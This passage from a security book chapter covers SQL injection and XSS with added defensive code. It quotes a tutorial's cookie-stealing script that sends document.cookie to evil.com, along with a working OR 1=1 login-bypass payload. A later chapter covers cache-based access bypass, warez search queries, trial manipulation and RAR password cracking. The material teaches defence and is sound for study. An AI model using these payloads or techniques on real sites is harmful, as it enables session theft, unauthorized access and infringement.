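def login_vulnerable(conn, username, password):
    """Returns the matched username, or None. With the chapter's payload the
    quote closes the string, OR 1=1 matches every row, and the trailing --
    turns the rest of the statement (the password check) into a comment, so
    the first row in the table, here the administrator, is returned."""
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterized query: the driver sends the values separately from the
    SQL text, so a quote or -- in the input is compared as characters and
    never parsed as SQL."""
    row = conn.execute(
        "SELECT * FROM Users WHERE Username = ? AND Password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


PAYLOAD = "Anyuser' OR 1=1--;"   # the username from the chapter's example

if __name__ == "__main__":
    conn = make_db()
    print(build_vulnerable_query(PAYLOAD, ""))
    print("vulnerable login returned:   ", login_vulnerable(conn, PAYLOAD, ""))
    print("parameterized login returned:", login_safe(conn, PAYLOAD, ""))
```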
Further attacks might include the use of stored procedures, like Microsoft SQL Server's 
xp_cmdshell stored procedure. If enabled, this would allow us to execute commands from the command line of 
the SQL server. Depending upon what privileges the SQL service is running under, this just might 
be game over for this particular box! 

SQL injection is most commonly a trial-and-error attack, although there are some tools that 
exist to help automate the process. One example is sqlmap (http://sqlmap.sourceforge.net/), which 
is a command line-based open source penetration testing tool that automates the process of 
detecting and exploiting SQL injection flaws and taking over back-end database servers. 

Another example is SQL Inject Me (https://addons.mozilla.org/en-US/firefox/addon/7597/), a 
Firefox add-on that automates the process of having to manually enter dozens or even hundreds 
of strings in a trial-and-error attack. In fact, in a recent penetration test, I used SQL Inject Me to 
identify an SQL injection vulnerability, which resulted in successfully penetrating that particular 
system. It should be noted, to state the obvious, that automating an injection attack to send dozens 
or hundreds of strings against a particular server will undoubtedly be noisy. In my test, noise was 
not an issue, but if stealth is important to your attack, an automated attack may not be the best 
option. Again, this is not intended to be a comprehensive look at SQL injection attacks; rather, 
these are just some examples to give you an idea of what is possible. 


Cross-Site Scripting 


XSS is a vulnerability associated with the ability of a user to inject data into a web page viewed 
by another user. In the case of XSS, the user may be able to access sensitive data without autho- 
rization, access credential data, or steal session cookies and impersonate other users, just as a few 
examples. XSS attacks were rated by OWASP as the number 2 web application security risk. 
Again, our discussion will necessarily be limited by size, so we'll just show a few examples. 

Steve Kemp, a UK-based systems administrator, has created a very simple but effective and interactive 
XSS tutorial to walk you through XSS attacks (http://www.steve.org.uk/Security/XSS/Tutorial/): 


[Screenshot of http://www.steve.org.uk/Security/XSS/Tutorial/ ("XSS Introduction"). The page reads: "This is a simple online explanation of XSS attacks designed to allow people to see in a hands on manner. It is interactive so that people can see the effects in real time, and to be simpler to follow." It lists six lessons: 1. Introduction: Setup the cookie; 2. Simple cookie stealing; 3. Basic filtered input; 4. Evading simple filtering; 5. I can run script, what now?; 6. Protecting against these attacks. It closes with: "This is intentionally a very simple set of 'lessons', and I'm glossing over a lot. Any comments are welcome though - mail me if you wish."] 
Steve's "Introduction" page sets up a cookie that is used in subsequent pages: "Simple Cookie 
Stealing" demonstrates how a user can use JavaScript in a text input box to display a cookie; 
"Evading Simple Filtering" shows how users can execute JavaScript by clicking on a link even 
though the <script> tags are filtered. Next, Steve demonstrates some more useful techniques: 


[Screenshot of the tutorial page "I can run script, what now?" (http://www.steve.org.uk/Security/XSS/Tutorial/whatnow.html). Its text reads:] 

You've seen how you can enter script into a page and have it run when a user clicks on a link, or views a page. 
This is really just a proof of concept, you don't want to have people viewing the popup boxes all day! 
So .. you want to do something more useful? 

Redirection 

One common technique is to redirect the user to a different website which you control. This would allow you to record the user's cookie for later (ab)use. 
The way I've done this in the past is to use code like this: 

<script> 
document.location = 'http://evil.com/blah.cgi?cookie=' + document.cookie; 
</script> 

This would redirect the user to a CGI script called 'blah.cgi' on a website 'evil.com'. 
The CGI script gets given the cookie of the innocent user as a parameter called 'cookie'. This could be recorded for use later. 

Other Tips 

Using the onClick handler you have to rely upon the user clicking on a link you have placed. 
You do run the risk that the user will not click it, so what then? 
You can use another method, onMouseOver; this allows you to have code executed when the mouse pointer merely moves over a link. 

This is used as follows: 

<a href="whatnow.html" onMouseOver="alert(document.cookie);">Test</a> 

As an example move your mouse over this link. 


Consider the following code: 


<script> 
document.location = 'http://evil.com/blah.cgi?cookie=' + document.cookie; 
</script> 


Here, Steve demonstrates a very simple way of redirecting the user to another website (preferably, 
one that you control) and recording the cookie for later use. Let’s take a look at a real world vulner- 
ability that Steve located on a popular free software project site: 


The Vulnerability 


Each project page contains a collection of links and information about it, as well as the ability for 
visitors to leave comments. 


Two forms of comments are allowed: plain text, or HTML text. 


The attributes of the HTML are inadequately sanitized, allowing a malicious commenter to create links 
which would execute arbitrary JavaScript. 


The following is an example of such a malicious link: 


<a href="http://foo.com/" onMouseOver="alert(1);">Foo.com</a> 


Impact 


The site uses a session ID stored in a cookie to keep track of a user's state. If a user is logged in and 
clicks upon a link (or moves over it, depending on the code), then they could be redirected to a 
different site which could steal their login credentials. 
In this case, the comments area of the site allowed both plain text and HTML. And because 
the HTML attributes were not adequately sanitized, a user could post code to execute arbitrary 
JavaScript by means of a malicious link into the comments area. This malicious link would then 
be displayed to subsequent users. This is a very basic introduction to XSS, but I think it's a good 
demonstration from a user's point of view; please check it out when you have the opportunity. 
Thanks Steve! There are many more real world vulnerabilities out there. The website 
http://www.xssed.com is the largest online archive of XSS vulnerable websites. 


[Screenshot of XSSed (http://www.xssed.com), the "Cross Site Scripting (XSS) attacks information" archive, with its XSS Archive, TOP Submitters and TOP Pagerank sections. The front page lists items such as "Just another persistent Twitter XSS" (updated 20 Jul 2010, a persistent XSS on Twitter's help center), "YouTube persistent XSS vulnerability" (affecting YouTube's comment field), "Persistent XSS vulnerability affecting Twitter promptly corrected" (Sunday, 27 June 2010) and "National Security Agency (NSA) SSL web page XSSed" (Wednesday, 23 June 2010).] 


Assuming you already know how XSS works, quite possibly the best resource is Robert 
“RSnake” Hansen's Cross-Site Scripting Cheat Sheet (http://ha.ckers.org/xss.html), which is also 
an appendix to the OWASP 2.0 guide. He is also one of the authors of XSS Exploits: Cross Site 
Scripting Attacks and Defense (Syngress, 2007), considered an authoritative book on XSS. 


[Screenshot of the "XSS (Cross Site Scripting) Cheat Sheet" at http://ha.ckers.org/xss.html, subtitled "Esp: for filter evasion".] 


Countermeasures 


In the last section of this chapter, we'll talk about how to prevent, or at least mitigate, many of the 
issues we discussed. Generally speaking, exact countermeasures will be specific to the particular 
SQL dialect and to the particular code on the site in question, and therefore it is more or less 
impossible to give exact countermeasures to every possible attack, especially in an overview chapter 
such as this. Rather, the idea here is to give the defender an idea of some of the general concepts 
that are used to prevent or mitigate the attacks described in this chapter. 
Parameterized Statements 


As we saw with SQL injection, the problem lies in the ability of the user to embed input directly 
within an SQL statement. This is a result of poor coding on the programmer's part. The solution to 
this is the parameterized statement. A parameterized statement is typically a fixed SQL statement 
where the user input is bound to a parameter, rather than being inserted directly into the statement text. 
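As an added example (not the book's code), here is the login query from the SQL injection section built both ways against an in-memory SQLite database holding constructed sample accounts: the string-concatenated version lets the input Anyuser' OR 1=1-- log in as the first account, while the parameterized version treats it as an ordinary, non-matching username. Table and column names, the sample accounts and the PBKDF2 work factor are assumptions; the hardened path also keeps passwords as salted hashes, as the Encryption countermeasure later in this section recommends.

```python
"""Added example, not the book's code: the login query from the SQL injection
section built both ways against an in-memory SQLite database with constructed
sample accounts. Table and column names, the accounts and the PBKDF2 work
factor are assumptions made for the demo."""
import hashlib
import hmac
import os
import sqlite3

INJECTED_USERNAME = "Anyuser' OR 1=1--"  # the input from the chapter
PBKDF2_ROUNDS = 100_000                   # work factor (assumption)


def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def build_db() -> sqlite3.Connection:
    """Constructed data. LegacyUsers keeps clear-text passwords, like the
    chapter's crude example; Users keeps a per-user salt and a PBKDF2 hash.
    In both tables admin is the first row, which is what the injection hits."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE LegacyUsers (Username TEXT, Password TEXT)")
    conn.execute("CREATE TABLE Users (Username TEXT, Salt BLOB, PwHash BLOB)")
    for name, pw in [("admin", "s3cret-admin"), ("alice", "hunter2")]:
        conn.execute("INSERT INTO LegacyUsers VALUES (?, ?)", (name, pw))
        salt = os.urandom(16)
        conn.execute("INSERT INTO Users VALUES (?, ?, ?)",
                     (name, salt, hash_password(pw, salt)))
    conn.commit()
    return conn


def login_vulnerable(conn, username: str, password: str):
    """User input pasted into the SQL text. With the injected username the
    statement becomes
        SELECT Username FROM LegacyUsers
         WHERE Username = 'Anyuser' OR 1=1--' AND Password = ''
    Everything after -- is a comment, the password check disappears, and
    the first row (admin) is returned. Returns the matched Username or None."""
    sql = ("SELECT Username FROM LegacyUsers WHERE Username = '" + username
           + "' AND Password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username: str, password: str):
    """Fixed SQL text; the username is bound as a parameter, so the quote and
    the -- inside it are only characters in a value and match no row. The
    password is then verified against the stored salted hash."""
    row = conn.execute(
        "SELECT Username, Salt, PwHash FROM Users WHERE Username = ?",
        (username,),
    ).fetchone()
    if row is None:
        return None
    name, salt, stored = row
    # constant-time compare so a wrong guess does not leak how close it was
    if hmac.compare_digest(hash_password(password, salt), stored):
        return name
    return None


def demo() -> dict:
    """Runs both logins with the injected input, valid and wrong credentials."""
    conn = build_db()
    return {
        "vulnerable_injected": login_vulnerable(conn, INJECTED_USERNAME, ""),
        "vulnerable_legit": login_vulnerable(conn, "alice", "hunter2"),
        "vulnerable_wrong_pw": login_vulnerable(conn, "alice", "wrong"),
        "parameterized_injected": login_parameterized(conn, INJECTED_USERNAME, ""),
        "parameterized_legit": login_parameterized(conn, "alice", "hunter2"),
        "parameterized_wrong_pw": login_parameterized(conn, "alice", "wrong"),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case:24s} -> {result}")
```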


Validating Inputs 


Validation is a countermeasure that is used to combat malicious inputs (i.e., changing the price 
as we showed in the first part of this chapter), SQL injection, and XSS. In the case of the price- 
changing example, validation means comparing the user inputs from the client side to the expected 
results on the server side. If the data doesn't match up, it should be rejected. In both SQL injection 
and XSS, validation can mean using whitelists and/or blacklists to validate expected characters 
and reject unexpected or malicious characters or strings. 


Escaping Characters 


Escaping is a means of treating a character differently than you would in some normal context. In 
the case of SQL injection, it means preventing injections by escaping characters that have special 
meaning in the SQL language. In the case of XSS, it means preventing malicious code by escaping 
any untrusted data. 


Filtering Characters and Statements 


Some sites (especially those that thrive on user interaction) will give users the option of using 
(some) HTML, so in these cases the sites simply cannot escape all HTML inputs. In this case, 
the user inputs need to be filtered. Filtering provides additional granularity, but it is also imperfect 
because of different browser implementations of HTML standards and differences in features. 
Sites will also try to identify malicious input and filter it out. 
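As an added example (not the book's or Steve Kemp's code) of the escaping and filtering countermeasures applied to the two comment types from the advisory above: plain-text comments are escaped whole, and HTML comments are rebuilt from an allow-list so that an onMouseOver attribute or a javascript: URL is dropped rather than displayed to the next visitor. The allowed tags, attributes and URL schemes are assumptions made for the demo.

```python
"""Added example, not the book's or Steve Kemp's code: the two comment types
from the advisory above run through the escaping and filtering
countermeasures. Allowed tags, attributes and URL schemes are assumptions."""
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# allow-list: tag -> attributes permitted on it (assumption for the demo)
ALLOWED_TAGS = {"a": {"href", "title"}, "b": set(), "i": set(), "p": set()}
ALLOWED_URL_SCHEMES = {"http", "https"}


def escape_plain_comment(text: str) -> str:
    """Plain-text comment: every character is data, so escape all of it."""
    return html.escape(text, quote=True)


def safe_url(value: str) -> bool:
    """Accept relative and http(s) URLs only. Control characters are removed
    first because browsers ignore them inside a scheme (java<TAB>script:
    would otherwise parse as a relative URL here but run as script there)."""
    cleaned = "".join(ch for ch in value if ord(ch) >= 0x20 and ch != "\x7f")
    scheme = urlparse(cleaned.strip()).scheme.lower()
    return scheme == "" or scheme in ALLOWED_URL_SCHEMES


class AllowListSanitizer(HTMLParser):
    """Re-emits only allow-listed tags and attributes. Unknown tags are
    dropped, unknown attributes (onMouseOver, onClick, ...) are dropped,
    and all text is escaped, so nothing the commenter wrote can execute."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []  # what was removed; worth logging on a real site

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.dropped.append(f"<{tag}>")
            return
        kept = []
        for name, value in attrs:  # HTMLParser lower-cases attribute names
            value = value or ""
            if name not in ALLOWED_TAGS[tag]:
                self.dropped.append(f"{tag}@{name}")
                continue
            if name == "href" and not safe_url(value):
                self.dropped.append(f"{tag}@href={value!r}")
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))

    def result(self) -> str:
        return "".join(self.out)


def sanitize_html_comment(markup: str):
    """Returns (safe_markup, list_of_dropped_items)."""
    parser = AllowListSanitizer()
    parser.feed(markup)
    parser.close()
    return parser.result(), parser.dropped


if __name__ == "__main__":
    # the malicious link from the advisory above
    print(sanitize_html_comment(
        '<a href="http://foo.com/" onMouseOver="alert(1);">Foo.com</a>'))
    print(sanitize_html_comment('<a href="javascript:alert(document.cookie)">x</a>'))
    print(escape_plain_comment('<script>alert(document.cookie)</script>'))
```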


Encryption 


Presuming that an attacker is able to bypass your other security measures and gain access to 
your data, there are some additional countermeasures that are available. For example, although it 
should be obvious, some SQL databases continue to store passwords in a plain text format. While 
ordinary users do not normally have direct access to the database (and thus do not have direct 
access to the passwords), storing each password as a salted hash instead of in plain text is a small but 
powerful defensive measure should an attacker gain access. 


Account Privileges 


Installed services (such as SQL Server) should be installed with only the permissions necessary to 
complete their job. Again, this seems obvious, but many services in the past installed with "local 
system" (or other OS-equivalent) account access, which is unnecessary. If a user were to gain control 
of a service with local system access, it's game over; if the account has been properly configured, 
the attacker will be limited to those permissions. 
Errors 


Error pages are often filled with detailed messages to aid the programmer in fixing the error. The 
problem, of course, is that these error messages also provide the attacker with the same infor- 
mation. Error pages should return a general message—in other words you want to remove any 
information from an error message that could help an attacker assess the validity of a potential 
vulnerability. 


Further Resources and References 


The SQL injection example was used with the permission of Chris Forant. The XSS tutorial page 
(http://www.steve.org.uk/Security/XSS/Tutorial/) was used with the permission of Steve Kemp. 
The Cross-Site Scripting Cheat Sheet (http://ha.ckers.org/xss.html) was created by Robert "RSnake" 
Hansen, and is also an appendix to the OWASP 2.0 guide. For more information on preventing 
SQL injection, check out the OWASP SQL Injection Prevention Cheat Sheet 
(http://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet). For more information on preventing 
XSS, check out the OWASP XSS Prevention Cheat Sheet 
(http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet). 


Chapter 6 
Finding It All on the Net 


Introduction 


A lot of people come to me and ask me to help them find things on the Internet. Well, if I find 
what they need and give it to them, I have helped them. But, if I teach them how to find what 
they need themselves, I have enlightened them. Every good hacker and any good defender have 
to know how to find files and information on the Internet. If they cannot locate the information, 
they may not have the means to attack the target or research the attack tool to defend their systems 
properly. 

Most people are unaware that almost everything, and I mean everything, is available somewhere 
on the Internet. The key is to know the various methods and tools that will help you acquire what 
you need. Another factor is having more than one method in your toolbox. If you stick 
to one method and it fails, you are out of luck. Another thing that can help you with your ability to 
research is to ask someone who knows how to find things. Joining forums is a great way to talk to 
people who may know how to help you find what you need. Also consider following people who 
are knowledgeable about the latest trends in the industry on Twitter. 

Let’s first start this chapter with a disclaimer. Never download illegal copies of software. 
The pirating of software is a serious problem and there are several agencies, such as the Business 
Software Alliance, that deal with the use and distribution of illegal software. Businesses and 
individuals can be fined large sums of money for using illegal software. Free illegal software is 
not always as free as some people think it is. Viruses and backdoors can be embedded into these 
illegal copies of software. It is true what your parents taught you, that you get what you pay for 
in life. However, having an understanding of the types of patches or cracks that hackers often use 
will allow you to get into the mind of a “hacker” and understand the methodologies they use to 
perform their tasks. Just because you have the ability to download illegal software, movies, and 
music does not mean you should. An ethical person would not choose to engage in such activity. 

Before ever conducting a Google (or other search engine) search, you have to "wear protection." 
Many of the sites mentioned in this chapter may contain links with malicious code that will 
launch when your browser makes a connection to their website. Do not use the same computer that 
you use to do your banking to research some of these concepts. Either use a separate computer to 
research hacking concepts or use a virtual machine (VM), preferably without tools installed. You 
can download Server or Player for free from VMware. Server is recommended because it allows 
for one snapshot. You will need to purchase an additional copy of Windows if you are installing 
it within VMware. Of course, you could just use a version of Linux in your VM. Many websites 
allow you to download preconfigured Linux VMs, including http://www.backtrack-linux.org/. 
Using Linux and Mac when researching these concepts is never a bad idea, because they are less 
vulnerable to attack. The majority of malicious code is written for Windows systems because they 
are the most prevalent. However, Mac, Linux, and Unix also can get viruses (or be owned). 

One tool you can use to prevent getting your browser hooked is NoScript. NoScript is a Firefox 
add-on that will prevent dangerous JavaScript from launching when you visit websites. If you are 
not a Firefox user, try to become one. While there is no one browser that will meet the needs of 
every individual, the add-ons for Firefox make it a major player in the browser arena. 


Before You Start 


To install NoScript, install the latest version of Firefox and perform the following steps: 


1. Open your Firefox browser, and type http://www.google.com in the address bar. 
2. Search for add-ons. You do not even have to spell it right—ad-ons. 

3. Click on the link for Firefox add-ons (should be the first hit). 

4. Search for NoScript within all add-ons. 

5. Click the Add to Firefox button. 

6. Click Install Now and restart Firefox. 


[Screenshot of the NoScript add-on page. Its description reads: "The best security you can get in a web browser! Allow active content to run only from sites you trust, and protect yourself against XSS and Clickjacking attacks." The developer asks for a small contribution (suggested donation: $15.00).] 

While NoScript will prevent a majority of malicious code from executing on your system when 
you are using Firefox, it will also prevent websites that you may trust, like Facebook.com, from 
working properly. However, if you trust a site, you can click Options and allow that site. 


[Screenshot: Facebook.com in Firefox with NoScript active. The page shows "JavaScript is disabled on your browser. Please enable JavaScript or upgrade to a JavaScript-capable browser to use Facebook", and the NoScript menu lists options such as Allow Scripts Globally (dangerous), Allow all this page, Temporarily allow all this page, Forbid fbcdn.net, Allow facebook.com, Temporarily allow facebook.com, and "Scripts Currently Forbidden | <SCRIPT>: 7 | <OBJECT>: 0".] 
The HostIP.info Geolocation plug-in for Firefox is another great tool that can be used when 
you visit sites that you do not fully trust. After installing the extension, you will be able to hover 
over any hyperlink on any web page and perform an IP Geolocation lookup. 


[Screenshot: HostIP.info Geolocation Plugin by Matt Walker and Brad Folkens, showing a lookup for the host addons.mozilla.org: IP 63.245.209.91, Location: Mountain View, CA, US.] 

To install the HostIP.info Geolocation plug-in, perform the following steps: 


1. Install the latest version of Firefox. 

2. Open your Firefox browser, and type http://www.google.com in the address bar. 
3. Search for add-ons. You do not even have to spell it right—ad-ons. 

4. Click on the link for Firefox add-ons (should be the first hit). 

5. Search for the HostIP.info Geolocation plug-in within all add-ons. 

6. Click the Download Now button. 

7. Click Install Now and restart Firefox. 


[Screenshot: addons.mozilla.org search results, "Showing 1 - 1 of 1 results for HostIP.info Geolocation Plugin": HostIP.info Geolocation Plugin by Matt Walker, Brad Folkens, "Displays Geolocation information for a website using hostip.info data. Works with all versions of Firefox." (12 reviews, 78 weekly downloads).] 


Some people google what they need to find and believe they will be safe from executing malcode 
if they just view the web page in Google's cache. However, when a site is opened in Google's 
cache, items like pictures (or malicious code) will be retrieved from the original site. To avoid this 
problem, a user can install the Passive Cache add-on for Firefox. This will allow the user to read 
text-only information from Google's cache without fear of launching any malicious code. 
[Screenshot of the add-on page "Add-ons for Firefox » Extensions » Passive Cache": Passive Cache 1.2 by Brian Baskin, updated March 9, 2008. "Passive Cache uses Google's text-only cache service and Archive.org Wayback Machine to display historical versions of a specified web link. This add-on allows for the viewing of a page, or site, while avoiding active connections to the target site."] 

To install the Passive Cache add-on for Firefox, perform the following steps: 


1. Install the latest version of Firefox. 

2. Open your Firefox browser, and type http://www.google.com in the address bar. 
3. Search for add-ons. You do not even have to spell it right—ad-ons. 

4. Click on the link for Firefox add-ons (should be the first hit). 

5. Search for Passive Cache within all add-ons. 

6. Click the Download Now button. 

7. Click Install Now and restart Firefox. 


Now, you can google any item in Firefox. If you want to view the text-only version of the web 
page, just right click on the web page in Google and select PassiveCache Google This Link. The 
text-only version of the web page will open in a new tab. You can also right click on any additional 
hyperlinks on the text-only page and select PassiveCache Google This Link. 


[Screenshot: a Google result for "ESPN: The Worldwide Leader In Sports" (espn.go.com) with the Firefox right-click menu open, showing items such as Open Link in New Window, Open Link in New Tab, Save Link As, Copy Link Location, IP2Location Lookup "173.194.33.104", DownloadHelper and NoScript.] 


Here is a good example of how the plug-in can help you. In this case, I am looking to download 
a file that is only available to registered members. In the case of this website, wiihacks.com 
is a forum where registration is free. The easiest thing to do is register and log in to the forum to 
view the links only registered members may view. In the case of wiihacks.com, I am a registered 
member, but I wanted to show how someone could use the plug-in to view what they are not supposed 
to see. This is not a problem unique to this website; rather, it is a byproduct of Google 
caching web pages that are not supposed to be viewable to the public. When the user clicks on the 
web link, they are locked out because only registered users may see the content. 
[Screenshot: a wiihacks.com forum post by a Junior Member (Join Date: Oct 2009, 10 posts) reading "Also your error is listed here on softchips forum. Do you have Cios38 rev14 installed? put ios 38 rev14 on your machine. for ios 249 download this." and "Your error is listed here ISSUE 95"; each link is replaced by "Only Registered Members May View Links | Click here to register".] 

When the page is viewed in Google Cache, or using Passive Cache, I can see and click the links. 


[Screenshot: the same post (12-17-2009 10:22 AM) viewed through Passive Cache; the links are now visible, including a rapidshare.com link for CIOS 249.] 


Researching with Caution 


Now that you are aware of some of the precautions that can be taken when you do research, we 
can discuss some of the techniques hackers use to obtain what they want from the Web. There is a 
proliferation of websites and forums where hackers can go to find tools and exploits that will assist 
them with their goals. An example of a site like this is www.crazyboris.org (make sure you type 
the “www” out or the site will not work). www.crazyboris.org has all types of bad files, including 
keyloggers, stealers, trojans, unpackers, poke code, and crypters. 


[Screenshot: crazyboris.org opened in Internet Explorer, with the address bar flagged "Unsafe Website".] 

When you try to visit the Crazy Boris website, you will be warned by the latter versions of Internet 
Explorer that the website has been reported as unsafe (wonder why). Just click More Information, 
then Disregard and continue to visit the website (at your own risk, of course). You will also notice 
that the URL bar is red to further indicate to the user that the website is unsafe. 
[Screenshot: Internet Explorer's "Reported Unsafe Website: Navigation Blocked" page for www.crazyboris.org. It reads "This website has been reported as unsafe ... This website has been reported to Microsoft for containing threats to your computer that might reveal personal or financial information", and offers: Go to my home page instead; More information; Learn more about malicious software; Report that this site does not contain threats; Disregard and continue (not recommended).] 

If you try to download any of the malware from the site and have Windows Defender installed, 
you will once again be warned that it is not recommended to download any files from this site. 
Be careful downloading any type of malware to your system. If you test the malware, you should 
be using VMs without tools installed and with the network interfaces set to host-only mode. Also 
keep in mind that some of the more sophisticated malware is VMware "aware" and may not work 
in a VM environment. 

In general, "black hat" hackers do not like to pay for their software; they often use pirated 
software. When hackers download their software from a variety of places on the Internet, it is 
often packaged with a patch or crack that will allow the hacker to turn trial or "time-limited" 
versions of software into a full-blown working package. Hackers will at times delete entries in the 
registry to extend trial periods or make trial versions into full ones. Sometimes hackers will have 
time on their side. Hackers often manipulate time settings to accomplish tasks like extending 
the trial period of software. If a hacker sets his BIOS to the year 2040, installs the software, then 
sets the BIOS back to the correct year, some software will extend the trial period by several extra 
years. Software companies are aware of these tricks and newer software will detect these attempts 
to circumvent the trial period. The Windows registry is a database of all settings on the system. 
It contains information about the programs that are installed on the system. The registry can be 
edited by typing regedit in the run box. However, Microsoft only recommends that advanced 
users edit the registry. If you really want to play around with the registry, install Windows into a 
VM and take a snapshot. If you hose the system, you can always return the computer to its working 
state by returning to the snapshot. Never manipulate settings of software to extend the trial 
period, because doing so is illegal. It is, however, important to understand how a hacker thinks 
and what methods they use to perform their deeds. 

Many websites allow users to download thousands of items such as software packages, books 
in PDF, movies, and MP3s. Some of this software is legal, but the majority of it is illegal. Examples 
of legal software packages include Linux distributions like Fedora and Ubuntu. The majority 
of the software displayed on these sites is illegal. Most of these sites are hosted outside of the United 
States and are located in countries that are immune from copyright laws. For example, the site 
caak.mn is based in Mongolia. These sites are like an "all-you-can-eat" smorgasbord for illegal 
software, music, and movie lovers. 
[Screenshot: a download site of this kind, with the Firefox status bar showing the host as Mobicom Company.] 

While many of these sites display page after page of copyrighted material, most of them do not 
store any of the programs on their servers. Rather, they provide direct or indirect links to servers 
where this software is stored. The sites www.rapidshare.com and www.megaupload.com are 
examples of sites that might store the files users are trying to download on their servers. Some of 
the links to these files are direct, like http://www.example.example/123/cd.rar. Links to these files 
on other websites are indirect, like hxxp://www.example.example/456/cd2.rar. The indirect links 
have to be corrected to work in a browser. Not only will this prevent noobs (newbies) from using 
the links to gain, it will prevent the propagation of these links across the Internet. Usually, these 
programs are split into several compressed files with a .rar extension. Once the files are uncompressed 
with a program like WinRAR or 7-Zip, they become one or more files or folders that contain 
the programs. WinRAR is not free, but its developers offer a free trial to users. 7-Zip is a free 
program available for download at www.7-Zip.org. 
A hacker can use a search engine, like Google, to find any piece of software they need. For 
example, searching Google for Fedora Core 7, an open source software package, together with the 
term "rapidshare.com" yields many results. Unfortunately, hackers can use this 
technique to find almost any copyrighted software, movie, or music. Search engine "power users" 
type what they are looking for and the name of a file hosting website, such as www.rapidshare.com, 
depotfiles.com, and megaupload.com. You should never use these techniques to do anything 
illegal; however, you can use these methods to look for legal software for "proof of concept." None 
of these sites endorse illegal activity. 

Some examples of searches that will yield you results for legal software include

backtrack 3 iso rapidshare.com
nc.exe rapidshare.com
putty.exe rapidshare.com
wireshark.exe rapidshare.com
7-Zip megaupload.com
ubuntu 10.04 megaupload


Important note: Before leaving the safety of the Google search engine and clicking any resulting 
links, be sure to have NoScript running and use Passive Cache if possible. 



One thing extremely interesting about rapidshare.com is that at one point it was among the 10 
most visited websites in the world. According to RapidShare, they have 5.4 petabytes of storage. 
That is 5,530 terabytes of storage, which is 5,662,310 GB. To put that in perspective, an electronic 
version of the Library of Congress would take up under 12 terabytes. Sites like rapidshare.com 
and megaupload.com allow users to download a single file for free with little or no wait time. I call 
that the "hook." This won't work when a user needs to download multiple files or parts of a file. 

Once you make an initial download as a free user, your subsequent downloads will require 
longer wait periods. To avoid wait periods, you can sign up and become a premium user. Premium 
users pay a monthly fee and can directly download an unlimited amount of files in a given time 
period. A premium user also has the ability to store files that can be retrieved from any location 
via Internet links. A user’s stored files can be removed if they post the links on the Internet and 
users complain about the material. 


Such file does not exist or it has been removed for infringement of copyrights. 


When a user has a premium account, they can use that account to store whatever they want. Think of the implications of that statement. This allows users to upload and download large files from anywhere they have an Internet connection. A user with bad intentions, for example, could upload confidential company documents to their RapidShare storage. So, rapidshare.com can be used as a method to exfiltrate large amounts of data from the network.

What amazes me most is that RapidShare has already become ingrained in the mind of today’s 
youth. When I was teaching a class, I directed a student to get a service pack for their system. 
Everyone knows getting a service pack for a Microsoft operating system is as easy as going to 
Microsoft.com and downloading it (at no cost). I saw that student go to Google and type the 
name of the service pack followed by “rapidshare.com.” I could not believe the student was using 
the RapidShare method to obtain their service pack. I then realized that RapidShare is a perfect 
solution for individuals with an instant gratification mindset. 


160 m Defense against the Black Arts 


Users can pass larger files by splitting the files up into multiple segments. For example, if a file 
is 2.7 GB, the user can split it up into 27 100 MB parts. The user will then upload all the RAR 
files and receive a unique RapidShare link for each of the 27 RAR files. Once all 27 RAR files have 
been downloaded by another user, they can join the files using Winrar or 7-Zip. 

To split a large file into several 100 MB RAR files, 


1. Install the latest version of Winrar. 
2. Right click on the file and select Add to Archive. 
3. Choose Zip100 from the Split to volume, bytes drop down box and click OK. 




After users have split their file into RAR files and uploaded them to rapidshare.com, they can then 
post the links. A user will need to download all of the RAR files in order to uncompress all of the 
parts and obtain the original file. If a user misses one or more of the RAR files, it is very unlikely 
that they will be able to extract anything usable from the archives. 


Code: [forum post listing nine rapidshare.com links, one for each archive part from .part01.rar through .part09.rar]


Some users also set a password on their RAR files. Passwords are often included on the same 
web page where the links are present. If you do not have the password for the corresponding RAR 
files, you cannot extract the archive. One trick that sometimes works is to just double click on 
the RAR file. In some cases, the password will be displayed right there in the top right pane of 
the screen. 
[WinRAR screenshot: the comment pane at the top right of the archive window reads “Password : www.insecurity.ro”]

If the password is not listed on the website or available by double clicking on the file, you have 
two options: 


1. Try to google the name of the file and see if the password, or code, is listed on another 
website. 

2. Use a RAR password cracker. There are free and commercially available RAR password 
crackers. 


To set a password when you are compressing a file with Winrar, perform the following steps: 


1. Right click on the file and choose Add to Archive.
2. Click on the Advanced tab, and click Set Password.
3. Click the Show Password box.
4. Type in the password.




To attempt to crack a Winrar password using a RAR password cracker, 


1. Download the program from http://www.rarpasswordcracker.com/rpc412.zip. 
2. Install the program. 

3. Open the RAR Password Cracker wizard. 

4. Click Load Archive, browse to the file and double click on it. 

5. Click Add to Project, click Next. Click OK to the warning. 
6. Select Dictionary Attack and click Next.
7. Click Add and add the dictionary file: C:\Program Files\Cain\Wordlists\wordlist.txt. 
8. Click Next. Give the project a name and click the Finish button. 




Advanced Google 


As you know, Google can also be used without using the terms “rapidshare” and “megaupload.” But, sometimes just typing in the terms you use for a normal search will not get you what you need. Sometimes it can be beneficial to be aware of Google’s advanced operators. A list of them can be found at www.google.com/intl/en/help/operators.html. Operators like link:, site:, and allintitle: can be used to improve your searching efficiency. A good example of using the advanced operators intitle and index.of to locate a specific file is ?intitle:index.of? nc.exe.

This method is extremely effective when I am in a situation where I need to retrieve a file quickly. After typing your search, simply click on any of the links provided by Google to see if the file exists on the site, then download it. Of course, you could replace the name of the file (nc.exe) with anything you want, like mp3, xls, doc, and so on. Never use this technique to download anything that is copyrighted.


